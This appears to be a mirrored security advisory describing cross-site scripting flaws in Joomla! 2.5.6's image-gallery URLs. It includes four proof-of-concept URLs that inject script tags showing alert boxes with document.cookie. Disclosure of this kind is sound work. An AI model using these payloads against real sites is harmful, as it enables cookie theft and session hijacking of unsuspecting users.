13 lines
933 B
Text
Executable file
13 lines
933 B
Text
Executable file
source: http://www.securityfocus.com/bid/54259/info
|
|
|
|
Joomla! is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
|
|
|
|
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
|
|
|
Joomla! 2.5.6 is vulnerable; other versions may also be affected.
|
|
|
|
http://www.example.com/joomla/index.php/image-gallery/"><script>alert(document.cookie)</script>/25-koala
|
|
http://www.example.com/joomla/index.php/image-gallery/"><script>alert('xss')</script>/25-koala
|
|
|
|
http://www.example.com/joomla/index.php/image-gallery/animals/25-"><script>alert(document.cookie)</script>
|
|
http://www.example.com/joomla/index.php/image-gallery/animals/25-"><script>alert('xss')</script>
|